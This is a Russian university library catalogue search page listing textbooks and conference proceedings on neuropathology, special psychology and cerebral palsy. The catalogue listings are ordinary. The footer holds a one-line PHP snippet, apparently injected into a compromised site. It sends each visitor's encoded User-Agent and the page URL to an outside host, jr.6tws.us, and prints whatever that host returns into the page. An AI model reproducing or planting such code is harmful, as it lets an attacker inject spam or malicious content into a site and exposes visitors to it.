Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

44 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПАРАЛИЧ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 28
1. 
Бадалян, Левон Оганесович. Невропатология : учебник для вуза / Л.О Бадалян, 2007. - 400 с.
Ключевые слова 
медицина -- история невропатологии -- эволюционная невропатология -- нервная система -- мозг -- анатомия нервной системы -- высшая нервная деятельность -- неврологические синдромы -- болезни нервной системы у детей -- врожденные заболевания -- хромосомные болезни -- болезнь дауна -- детский церебральный паралич -- дцп -- гидроцефалия -- микроцефалия -- наследственные болезни -- прогрессирующая мышечная дистрофия -- факоматозы -- инфекционные болезни нервной системы -- травмы -- эпилепсия -- опухоли головного мозга -- неврозы -- лечение заболеваний нервной системы -- дефектолог -- дети с поражением нервной системы -- слепой ребенок -- слабовидящий ребенок -- глухой ребенок -- слабослышащий ребенок -- дети с дцп -- дети с задержкой речевого развития -- задержка речевого развития -- заикание
Держатели документа (Информация об экземплярах) 
2. 
Физическая реабилитация : учебник для вузов / ред. С. Н. Попов, 2008. - 603 с.
Ключевые слова 
медицина -- травматология -- ортопедия -- заболевания сердечно-сосудистой системы -- заболевания органов дыхания -- заболевания органов пищеварения -- расстройство обмена веществ -- заболевания суставов -- заболевание органов мочевыделения -- оперативное вмешательство -- грудная клетка -- брюшная полость -- заболевания нервной системы -- повреждение нервной системы -- остеохондроз позвоночника -- беременность -- гимнастика в период беременности -- роды -- гимнастика в родах -- послеродовой период -- гимнастика после родов -- гинекологические заболевания -- лечебная физкультура -- детский церебральный паралич -- дцп -- реабилитация инвалидов
Держатели документа (Информация об экземплярах) 
3. 
Логопедия : методическое наследие : пособие для логопедов и студ. дефектол. факультетов пед. вузов : В 5 кн. / ред. Л. С. Волкова. Кн. 1 : Нарушение голоса и звукопроизносительной стороны речи : в 2 ч.Ч. 2. / авт.-сост.: С. Н. Шаховская, Т. В. Волосовец, Л. Г. Парамонова, 2003. - 303 с.
Держатели документа (Информация об экземплярах) 
4. 
Архипова, Елена Филипповна. Логопедическая работа с детьми раннего возраста : учебное пособие для студентов пед. вузов / Е. Ф. Архипова, 2007. - 224 с.
Держатели документа (Информация об экземплярах) 
5. 
Колобова, Галина Дмитриевна. Невропатология : учебное пособие для вузов / Г. Д. Колобова, 2008. - 319 с.
Ключевые слова 
беспозвоночные животные -- позвоночные животные -- онтогенез нервной системы человека -- развитие сенсомоторных функций -- анатомия нервной системы -- головной мозг -- ствол мозга -- спинной мозг -- периферическая нервная система -- вегетативная нервная система -- физиология высшей нервной деятельности -- безусловны рефлекс -- рефлекторная дуга -- условный рефлекс -- высшая нервная деятельность -- торможение нервных процессов -- иррадиация -- концентрация -- взаимная индукция -- сон -- сигнальные системы -- темперамент -- невротические симптомы -- невротические синдромы -- поражения пирамидного пути -- паралич -- периферический паралич -- церебральный паралич -- нарушения памяти -- нарушения мышления -- нарушения интеллекта -- полисомии половых хромосом -- болезнь дауна -- синдром эдвардса -- синдром патау -- митохондриальные болезни -- фенилкетонурия -- гепатоцеребральная дистрофия -- гистидинемия -- гнойный менингит -- туберкулезный менингит -- эпидемический энцефалит -- клещевой энцефалит -- герпетический энцефалит -- склероз -- детский церебральный паралич -- эпилепсия -- нейрогенный мочевой пузырь -- ночной энурез -- неврозы -- патологии речи -- расстройства речи -- дизартрия -- нарушение слуха
Держатели документа (Информация об экземплярах) 
6. 
Основы специальной психологии : учебное пособие для среднего профессионального образования, по специальности "Специальное дошкольное образование", "Коррекционная педагогика" / Л. В. Кузнецова, Л. И. Переслени, Л. И. Солнцева ; ред. Л. В. Кузнецова, 2008. - 480 с.
Ключевые слова 
психология специальная -- развитие нормальное -- развитие отклоняющееся -- коррекция психологическая -- детская психология -- коррекционная педагогика -- коррекционная психология -- психология умственно отсталого ребенка -- умственно отсталый ребенок -- дети с отклонениями в психическом развитии -- зпр -- задержка психического развития -- дети с нарушениями слуха -- сурдопсихология -- дети с нарушениями зрения -- тифлопсихология -- дети с нарушениями речи -- логопсихология -- дети с нарушениями опорно-двигательного аппарата -- детский церебральный паралич -- расстройства эмоциональной сферы -- расстройства поведения -- дети со сложными нарушениями развития -- выявление отклонений в развитии -- психологическая диагностика -- дети со специальными образовательными потребностями
Держатели документа (Информация об экземплярах) 
7. 
Психолого-педагогическая и медико-социальная поддержка лиц с проблемами в развитии : материалы Всероссийской научно-практической конференции (Бийск, 15-16 мая 2008 г.) : в 2-х ч.Ч. 1 / отв. ред. Н. А. Першина ; ред. Н. Б. Шевченко [и др.], 2008. - 398 с.
Ключевые слова 
повышение квалификации учителей-логопедов -- дети с особыми образовательными потребностями -- эмоциональное выгорание учителей специальных школ -- методика преподавания географии -- система монтессори м. -- синдром дауна -- умственная отсталость -- 1 год -- 2 года -- 3 года -- кризисная жизненная ситуация -- онкологические больные -- спид -- девиантное поведение -- суицид -- профилактика суицида -- детский суицид -- здоровье учащихся -- здоровье учителя -- подростковый суицид -- юношеский суицид -- социализация дезадаптированных подростков -- эмоциональное благополучие -- психическое здоровье -- дети-сироты -- детский аутизм -- детский церебральный паралич -- урок математики -- труды
Оглавление 
  • Арутюнян, Анна Юрьевна. Подготовка специалистов-дефектологов в России / А. Ю. Арутюнян [и др.]. - с.11
    Другие авторы: Першина Н. А., Горбатая Е. А., Денисенко О. Н.
  • Басаргина, Л. В. Основные проблемы организации повышения квалификации учителей-логопедов / Л. В. Басаргина. - с.15
  • Башмакова, С. Б. Система работы педагога в процессе обучения школьников с особыми образовательными потребностями / С. Б. Башмакова. - с.19
  • Бородина, А. В. Развитие эмпатии к детям с особыми образовательными потребностями у будущих педагогов / А. В. Бородина. - с.23
  • Веремей, А. Г. Особенности профессиональной подготовки студентов к работе с детьми с особыми образовательными потребностями / А. Г. Веремей. - с.27
  • Васильева, И. П. К проблеме определения профессиональной компетентности специальных психологов / И. П. Васильева. - с.30
  • Ганцева, О. И. О некоторых особенностях профессиональной подготовки социальных работников в колледжах Германии / О. И. Ганцева. - с.35
  • Гришанова, Е. А. Подготовка специалистов для работы с детьми с разными образовательными потребностями через работу стажерской площадки / Е. А. Гришанова. - с.38
  • Гусева, Татьяна Артуровна. Диагностика стилей познавательной активности в обучении специальных психологов / Т. А. Гусева, К. Я. Вейберт. - с.41
  • Коновалова, Е. Ю. Компетентностный подход к подготовке педагогов к обучению на дому детей с ограниченными возможностями здоровья / Е. Ю. Коновалова. - с.48
  • Ольхина, Е. А. Актуальные проблемы эмоционального выгорания учителей специальных (коррекционных) школ / Е. А. Ольхина. - с.51
  • Пилипчук, Л. С. Проблема эмоционального выгорания в деятельности воспитателей и педагогов-дефектологов специализированных дошкольных учреждений / Л. С. Пилипчук. - с.54
  • Речицкая, Екатерина Григорьевна. Инновационные подходы к подготовке дефектологов / Е. Г. Речицкая. - с.58
  • Самофалова, А. А. К вопросу о готовности студентов первого курса к обучению в Институте специальной педагогики / А. А. Самофалова. - с.60
  • Сетько, Е. В. Организация и создание условий для профессионального роста педагога как средство совершенствования психолого-педагогической поддержки учащихся в учебно-воспитательном процессе / Е. В. Сетько. - с.62
  • Соломина, Е. Н. Система контроля знаний студентов при изучении курса "Методика преподавания географии" в специальной (коррекционной) школе VIII вида / Е. Н. Соломина. - с.57
  • Султанова, Р. Ф. Саморегуляция как способ формирования стрессоустойчивости педагогов коррекционных учреждений / Р. Ф. Султанова, Н. И. Трубникова. - с.70
  • Бердникова, З. В. Реализация социального аспекта индивидуальной программы реабилитации детей-инвалидов / З. В. Бердникова. - с.73
  • Буянова, Г. Н. Ученическое самоуправление в школах для детей с нарушениями зрения / Г. Н. Буянова. - с.76
  • Важнова, Л. В. Осуществление комплексного подхода в организации коррекционно-развивающей работы дошкольного образовательного учреждения / Л. В. Важнова. - с.83
  • Валикова, В. Д. Психологическое здоровье ученика и учителя - основа их успешного взаимодействия / В. Д. Валикова. - с.86
  • Горелкина, О. В. Интеграция и социализация лиц с особыми образовательными потребностями средствами дополнительного образования / О. В. Горелкина. - с.90
  • Елисова, Л. В. Организация воспитательно-образовательного процесса в группе кратковременного пребывания для детей со специальными потребностями с использованием технологий М. Монтессори / Л. В. Елисова, О. П. Мочалова. - с.93
  • Иванова, Т. В. Интегрированные уроки как условие организации продуктивного обучения / Т. В. Иванова. - с.96
  • Исаева, Марина Борисовна. Подходы к реализации как категории образования / М. Б. Исаева. - с.100
  • Карева, И. Г. Некоторые аспекты обучения математике дошкольников с проблемами развития / И. Г. Карева. - с.105
  • Колпакова, Н. В. Профессиональное взаимодействие психолога и педагогов специальных (коррекционных) образовательных учреждений / Н. В. Колпакова. - с.109
  • Космачева, Н. К. Проектная деятельность как средство социализации молодежи с ограниченными возможностями здоровья / Н. К. Космачева, Г. Г. Горбатовская, Т. Л. Черемисина. - с.112
  • Можан, Н. И. Становление и развитие социально-педагогической работы с детьми с ограниченными возможностями в Тарском районе Омской области / Н. И. Можан. - с.115
  • Мялькин, В. Н. Особенности обучения токарному делу учащихся с ограниченными физическими возможностями / В. Н. Мялькин. - с.119
  • Новолодская, Елена Геннадьевна. Тематическая неделя в коррекционной школе "Школа цветного настроения" / Е. Г. Новолодская. - с.122
  • Ольгин, И. И. Актуальность внедрения адаптивной физической культуры в образовательные учреждения / И. И. Ольгин. - с.127
  • Соловьева, С. В. Организация межведомственного взаимодействия в процессе комплексной реабилитации детей и подростков с ограниченными возможностями здоровья / С. В. Соловьева. - с.130
  • Сухорукова, Л. И. Информированность и отношение населения г. Бийска к проблеме людей с умственной отсталостью, синдромом Дауна / Л. И. Сухорукова, Н. А. Першина. - с.140
  • Талипова, О. А. Влияние психологических особенностей личности на политическую активность молодежи с ограниченными возможностями здоровья / О. А. Талипова, А. П. Гасилина. - с.145
  • Тюканов, В. Л. Основы адаптивной физической культуры / В. Л. Тюканов. - с.149
  • Тушева, Е. С. Интегрированное обучение детей с ограниченными возможностями развития / Е. С. Тушева. - с.153
  • Упоров, Д. В. Психолого-медико-педагогическое и нормативно-правовое сопровождение процесса инклюзивного профессионального образования инвалидов / Д. В. Упоров. - с.158
  • Упоров, Д. В. Организация и содержание профориентационной работы с детьми, имеющими особые образовательные потребности / Д. В. Упоров. - с.164
  • Ходакова, М. Н. Состояние детской инвалидности в г. Бийске / М. Н. Ходакова, Н. М. Медведева. - с.172
  • Шмакова, М. Е. Дефектологическое сопровождение учащихся с особыми образовательными потребностями в системе начального профессионального образования / М. Е. Шмакова. - с.174
  • Шуваева, В. Модель взаимодействия педагога-психолога и учителя-логопеда в условиях общеобразовательной школы / В. Шуваева. - с.177
  • Шурдукалов, В. Н. Развитие системы специального образования Красноярского края / В. Н. Шурдукалов. - с.181
  • Богданова, О. Ф. Организация работы с семьями, имеющими детей с ограниченными возможностями / О. Ф. Богданова. - с.185
  • Вахрушева, А. С. Факторы, обуславливающие низкую готовность родителей к жизни с ребенком, имеющим отклонения в развитии / А. С. Вахрушева. - с.189
  • Иванова, О. И. Круглый стол как форма работы с семьей / О. И. Иванова. - с.191
  • Клиновицкая, Л. А. Опыт проведения работы с детьми-инвалидами и их семьями в отделении реабилитации / Л. А. Клиновицкая. - с.193
  • Крехтунова, М. В. Проблемы организации родителей, имеющих детей с ограниченными возможностями здоровья / М. В. Крехтунова. - с.200
  • Нецветаева, М. Л. Ребенок с особыми потребностями в семье, его сопровождение / М. Л. Нецветаева. - с.204
  • Сергеева, И. В. Социально-психологические проблемы семьи, воспитывающей ребенка с отклонениями в развитии / И. В. Сергеева. - с.207
  • Бондарева, Л. А. Создание Монтессори-групп "Вместе с мамами" как условие раннего патронажа детей от 1 до 3 лет с проблемами развития / Л. А. Бондарева. - с.211
  • Дудьев, Василий Петрович. Комплексно-системный подход к профилактике, выявлению и коррекции отклонений психомотоного развития у детей раннего возраста с перинатальной патологией центральной нервной системы / В. П. Дудьев. - с.217
  • Мироненко, С. Н. Педагогическая реабилитация детей раннего возраста в условиях Дома ребенка / С. Н. Мироненко, Н. П. Сапцина. - с.225
  • Телицына, Л. В. влияние коррекционно-развивающей программы на снижение агрессии и ослабление негативных эмоций у детей раннего возраста в условиях Дома ребенка / Л. В. Телицына. - с.229
  • Гога, О. М. Программа социально-психологической помощи семьям, оказавшимся в кризисной ситуации и имеющим ребенка-инвалида / О. М. Гога. - с.233
  • Жукова, А. Н. Особенности переживания надежды людьми, находящимися в кризисном состоянии / А. Н. Жукова, Я. Г. Казанцева. - с.241
  • Кутнякова, Ю. Г. Психологические особенности идентичности у людей, находящихся в кризисной жизненной ситуации / Ю. Г. Кутнякова, Я. Г. Казанцева. - с.244
  • Мельникова, Е. А. Социально-психологические аспекты сопровождения ВИЧ-положительных / Е. А. Мельникова. - с.246
  • Гонохова, Тамара Алексеевна. К вопросу об условиях формирования девиантного поведения / Т. А. Гонохова. - с.250
  • Гусева, Татьяна Артуровна. Система мероприятий профилактики суицида среди детей, подростков и юношей / Т. А. Гусева, Т. А. Кречетова. - с.258
  • Дмитриева, Н. В. Психологические проявления пограничной личностной организации / Н. В. Дмитриева, Ц. П. Короленко. - с.262
  • Короленко, Цезарь Петрович. Психологическое состояние диссоциативной идентичности / Ц. П. Короленко, Н. В. Дмитриева. - с.271
  • Кузнецова, Любовь Николаевна. Условия социализации дезадаптированных подростков / Л. Н. Кузнецова. - с.280
  • Манузина, Елена Борисовна. Педагогическая поддержка как условие коррекции социальной дезадаптации детей и подростков / Е. Б. Манузина. - с.286
  • Терентьева, Нина Павловна. Психолого-педагогическая коррекция защитного функционирования у подростков с проблемами развития / Н. П. Терентьева. - с.291
  • Тюрикова, К. С. Сказкотерапия как метод снижения агрессивности у младших подростков / К. С. Тюрикова, Н. А. Першина. - с.295
  • Фебенчукова, Анна Васильевна. Психологическая ригидность в контексте синергетического подхода / А. В. Фебенчукова. - с.299
  • Шагина, С. А. Социально-психологическая профилактика девиантного поведения подростков / С. А. Шагина. - с.302
  • Алмазова, О. В. Работа специального психолога в условиях дома ребенка / О. В. Алмазова, В. И. Коровина. - с.306
  • Алякритская, Г. О. Эмоциональное благополучие - залог психического здоровья / Г. О. Алякритская. - с.310
  • Дубовицкая, Н. В. Развитие личностной культуры у детей, оставшихся без попечения родителей / Н. В. Дубовицкая, В. А. Пяткова, В. И. Белоусова. - с.313
  • Дубовицкая, Н. В. Жизнеустойчивость воспитанниц женской гимназии-интерната / Н. В. Дубовицкая, О. А. Милинис, П. В. Бурдуковская. - с.317
  • Мокроусова, О. Б. Формирование здорового образа жизни в условиях детского дома / О. Б. Мокроусова, Е. В. Никушкина, Н. В. Никушкина. - с.321
  • Никушкина, Е. В. Организация деятельности КГОУ "Бийский детский дом №3" в условиях развития института замещающих семей / Е. В. Никушкина, Н. В. Никушкина, И. А. Береза. - с.325
  • Опенышева, Т. В. Подготовка умственно отсталых детей-сирот и детей, оставшихся без попечения родителей к самостоятельной жизни / Т. В. Опенышева. - с.328
  • Шабалина, Л. Ю. Продуктивная деятельность педагога - путь к успешной социализации ребенка / Л. Ю. Шабалина. - с.333
  • Якимова, Е. Д. Социализация детей 2-го и 3-го года жизни по методу Марии Монтессори в условиях Бийского Дома ребенка / Е. Д. Якимова. - с.337
  • Алмазова, О. В. Игротерапия в работе с аутичными детьми, имеющими выраженные нарушения в коммуникативно-аффективной и когнитивной сферах / О. В. Алмазова, Ю. В. Бессмертная. - с.343
  • Бессмертная, Ю. В. Развитие коммуникативных способностей у аутичных детей, имеющих выраженные нарушения в коммуникативно-аффективной и когнитивной сферах / Ю. В. Бессмертная, О. В. Алмазова. - с.347
  • Богатова, Т. А. Проблемы общения ребенка с РДА / Т. А. Богатова. - с.351
  • Жаркова, Л. В. Мой волшебный ребенок / Л. В. Жаркова. - с.353
  • Жулдыбина, А. А. Родители и аутичный ребенок / А. А. Жулдыбина, О. И. Нагайцева. - с.354
  • Запрягаева, Ю. С. Формирование "учебного поведения", как основного этапа подготовки ребенка с ранним детским аутизмом к школьному обучению / Ю. С. Запрягаева. - с.357
  • Керре, И. О. Организация работы по социализации детей дошкольного возраста с ранним детским аутизмом / И. О. Керре. - с.360
  • Косова, Н. Особенности эмоционально-волевой сферы детей с РДА / Н. Косова. - с.365
  • Кузнецова, Н. В. Особый ребенок в социуме / Н. В. Кузнецова. - с.368
  • Соколова, А. Н. "Я хочу, чтобы меня поняли..." / А. Н. Соколова. - с.370
  • Чуешева, Н. А. Возможности и проблемы интегрированного обучения аутичных детей дошкольного возраста / Н. А. Чуешева. - с.372
  • Шипунова, М. Н. Социализация детей с расстройствами аутического спектра средствами музыки / М. Н. Шипунова. - с.376
  • Воронова, О. М. Развитие творческих способностей у детей младшего школьного возраста с ДЦП / О. М. Воронова, Н. Б. Шевченко. - с.382
  • Малкова, Н. Н. Медико-экологические и социальные проблемы адаптации детей с поражением ДЦП / Н. Н. Малкова, З. Н. Бесчастнова, И. Н. Басова. - с.385
  • Мамаева, А. В. Опора на различные уровни организации функции в логопедической работе с детьми, имеющими множественные нарушения в развитии на фоне церебрального паралича / А. В. Мамаева. - с.389
  • Трусова, Г. М. Методы социализации школьников с нарушениями опорно-двигательного аппарата, реализуемые на уроках математики / Г. М. Трусова. - с.393
Держатели документа (Информация об экземплярах) 
8. 
Психологическое и социальное сопровождение больных детей и детей-инвалидов : учебное пособие / ред.: С. М. Безух, С. С. Лебедева, 2007. - 112 с.
Ключевые слова 
психолого-социальное сопровождение больных с детским церебральным параличом -- детский церебральный паралич -- дцп -- задержка психического развития -- зпр -- инфантилизм -- нарушение эмоционально-волевой сферы -- патологическое развитие личности -- качество жизни -- психологическое сопровождение -- индивидуальная работа -- социальное сопровождение -- больные и инвалиды с резидуально-органическими поражениями головного мозга -- нарушение поведения -- комната психоневрологической разгрузки -- музыкотерапия -- маскотерапия -- трудотерапия -- психолого-социальное сопровождение семей -- дети и подростки с проблемами развития -- коорекционное образование -- дети с проблемами слуха -- дети с проблемами зрения -- работа с детьми ограниченных возможностей средствами компьютерной игры -- обучающие программы при мягком поражении левого полушария -- детский сад -- выпускник коррекционной школы -- работа с семьей детей-инвалидов -- физкультурно-оздоровительные мероприятия -- спортивные мероприятия -- социальная адаптация
Держатели документа (Информация об экземплярах) 
9. 
Мамайчук, Ирина Ивановна. Психокоррекционные технологии для детей с проблемами развития : учебное пособие для вузов / И. И. Мамайчук, 2006. - 400 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Основы специальной психологии : учебное пособие для среднего профессионального образования по специальности "Специальное дошкольное образование", "Коррекционная педагогика" / Л. В. Кузнецова, Л. И. Переслени, Л. И. Солнцева ; ред. Л. В. Кузнецова, 2005. - 480 с.
Ключевые слова 
ПСИХОЛОГИЯ СПЕЦИАЛЬНАЯ -- РАЗВИТИЕ НОРМАЛЬНОЕ -- РАЗВИТИЕ ОТКЛОНЯЮЩЕЕСЯ -- КОРРЕКЦИЯ ПСИХОЛОГИЧЕСКАЯ -- ДЕТСКАЯ ПСИХОЛОГИЯ -- КОРРЕКЦИОННАЯ ПЕДАГОГИКА -- КОРРЕКЦИОННАЯ ПСИХОЛОГИЯ -- ПСИХОЛОГИЯ УМСТВЕННО ОТСТАЛОГО РЕБЕНКА -- УМСТВЕННО ОТСТАЛЫЙ РЕБЕНОК -- ДЕТИ С ОТКЛОНЕНИЯМИ В ПСИХИЧЕСКОМ РАЗВИТИИ -- ЗПР -- ЗАДЕРЖКА ПСИХИЧЕСКОГО РАЗВИТИЯ -- ДЕТИ С НАРУШЕНИЯМИ СЛУХА -- СУРДОПСИХОЛОГИЯ -- ДЕТИ С НАРУШЕНИЯМИ ЗРЕНИЯ -- ТИФЛОПСИХОЛОГИЯ -- ДЕТИ С НАРУШЕНИЯМИ РЕЧИ -- ЛОГОПСИХОЛОГИЯ -- ДЕТИ С НАРУШЕНИЯМИ ОПОРНО-ДВИГАТЕЛЬНОГО АППАРАТА -- ДЕТСКИЙ ЦЕРЕБРАЛЬНЫЙ ПАРАЛИЧ -- РАССТРОЙСТВА ЭМОЦИОНАЛЬНОЙ СФЕРЫ -- РАССТРОЙСТВА ПОВЕДЕНИЯ -- ДЕТИ СО СЛОЖНЫМИ НАРУШЕНИЯМИ РАЗВИТИЯ -- ВЫЯВЛЕНИЕ ОТКЛОНЕНИЙ В РАЗВИТИИ -- ПСИХОЛОГИЧЕСКАЯ ДИАГНОСТИКА -- ДЕТИ СО СПЕЦИАЛЬНЫМИ ОБРАЗОВАТЕЛЬНЫМИ ПОТРЕБНОСТЯМИ
Держатели документа (Информация об экземплярах) 
11. 
Основы специальной психологии : учебное пособие для среднего профессионального образования, по специальности "Специальное дошкольное образование", "Коррекционная педагогика" / Л. В. Кузнецова [и др.] ; ред. Л. В. Кузнецова, 2006. - 480 с.
Ключевые слова 
психологическая коррекция -- детская психология -- психология умственно отсталого ребенка -- умственно отсталый ребенок -- дети с отклонениями в психическом развитии -- задержка психического развития -- дети с нарушениями слуха -- сурдопсихология -- дети с нарушениями зрения -- тифлопсихология -- дети с нарушениями речи -- логопсихология -- дети с нарушениями опорно-двигательного аппарата -- детский церебральный паралич -- расстройства эмоциональной сферы -- расстройства поведения -- дети со сложными нарушениями развития -- психологическая диагностика
Держатели документа (Информация об экземплярах) 
12. 
Основы специальной психологии [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / Под ред. Л. В. Кузнецовой, 2002. - 480 с.
Держатели документа (Информация об экземплярах) 
13. 
Вайнер, Эдуард Наумович. Лечебная физическая культура [Электронный ресурс] : учеб. для вузов по направлению 050700 "Педагогика" / Э. Н. Вайнер, 2009. - 1 o=эл. опт. диск (DVD-ROM). - [424] с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебнике представлены основные средства и методики использования ЛФК в соответствии с современными подходами. Учебник и написан в соответствии с требованиями Государственного образовательного стандарта педагогического образования. Он преимущественно ориентирован на детские (школьные) возрасты, особый акцент делается на широко распространенных детских заболеваниях и нарушениях здоровья (в частности, простудных и простудно-инфекционных заболеваниях) и на тех, которые в определенной степени провоцируются самим обучением (миопия). При этом рассматриваются возможности использования физических упражнений не только в терапии, но и в профилактике соответствующих заболеваний и нарушений здоровья. Выделен раздел, касающийся особенностей организации, содержания и работы специальной медицинской группы в образовательных учреждениях.

Для студентов педагогических вузов. Может быть рекомендован для использования учителям физической культуры различных звеньев образования, специалистам ЛФК, врачам.

14. 
Специальная психология [Текст] : учеб. пособие для дефектол. фак. высш. пед. учеб. заведений / В. И. Лубовский [и др.] ; под ред. В. И. Лубовского, 2006. - 460, [1] с.

В учебном пособии представлены основные теоретические положения специальной психологии, общие закономерности нарушенного психического развития и охарактеризовано психическое развитие при разных типах дизонтогенеза. Многие фактические данные публикуются впервые. В заключительной главе книги представлены направления практического применения специальных психологических знаний и другие вопросы, относящиеся ко всем типам нарушенного развития.

Для студентов дефектологических факультетов высших педагогических учебных заведений. Может быть полезно школьным психологам и учителям, а также педагогам дошкольных учреждений.

15. 
Специальная дошкольная педагогика : учебное пособие для вузов по специальности "Специальная дошкольная педагогика и психология" / ред. Е. А. Стребелева, 2001. - 312 с.
Держатели документа (Информация об экземплярах) 
16. 
Шипицына, Людмила Михайловна. Психология детей с нарушениями функций опорно-двигательного аппарата : учебное пособие для вузов по специальности 031900 "Специальная психология" / Л. М. Шипицына, И. И. Мамайчук, 2004. - 368 с.
Держатели документа (Информация об экземплярах) 
17. 
Бадалян, Левон Оганесович. Невропатология : учебник для вузов / Л. О. Бадалян, 2006. - 400 с.
Ключевые слова 
медицина -- история невропатологии -- дефектология -- эволюционная невропатология -- нервная система -- мозг -- анатомия нервной системы -- высшая нервная деятельность -- неврологические синдромы -- болезни нервной системы у детей -- лечение заболеваний нервной системы -- дефектолог -- дети с поражением нервной системы -- слепой ребенок -- слабовидящий ребенок -- глухой ребенок -- слабослышащий ребенок -- дети с дцп -- детский церебральный паралич -- дети с задержкой речевого развития -- дети с заиканием -- деонтология
Держатели документа (Информация об экземплярах) 
18. 
Бадалян, Левон Оганесович. Невропатология : учебник для вузов / Л. О. Бадалян, 2006. - 400 с.
Ключевые слова 
медицина -- история невропатологии -- дефектология -- эволюционная невропатология -- нервная система -- мозг -- анатомия нервной системы -- высшая нервная деятельность -- неврологические синдромы -- болезни нервной системы у детей -- лечение заболеваний нервной системы -- дефектолог -- дети с поражением нервной системы -- слепой ребенок -- слабовидящий ребенок -- глухой ребенок -- слабослышащий ребенок -- дети с дцп -- детский церебральный паралич -- дети с задержкой речевого развития -- дети с заиканием -- деонтология
Держатели документа (Информация об экземплярах) 
19. 
Шипицына, Людмила Михайловна. Психология детей с нарушениями функций опорно-двигательного аппарата : учебное пособие для вузов по специальности 031900 "Специальная психология" / Л. М. Шипицына, И. И. Мамайчук, 2004. - 368 с.
Держатели документа (Информация об экземплярах) 
20. 
Специальная психология [Текст] : Учеб. пособие для дефектол. фак. пед. вузов / В. И. Лубовский, Т. В. Розанова, Л. И. Солнцева и др.; Под ред. В. И. Лубовского, 2003. - 460, [1] с.

В учебном пособии представлены основные теоретические положения специальной психологии, общие закономерности нарушенного психического развития и охарактеризованно психическое развитие при разных типах дизонтогенеза. Многие фактические данные публикуются впервые. В заключительноц главе книги представлены направления практического применения специальных психологических знаний и другие вопросы, относящиеся ко всем типам нарушенного развития.

Полезно школьным психологам и учителям, а также педагогам дошкольных учреждений.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2990 - 17.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.05 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;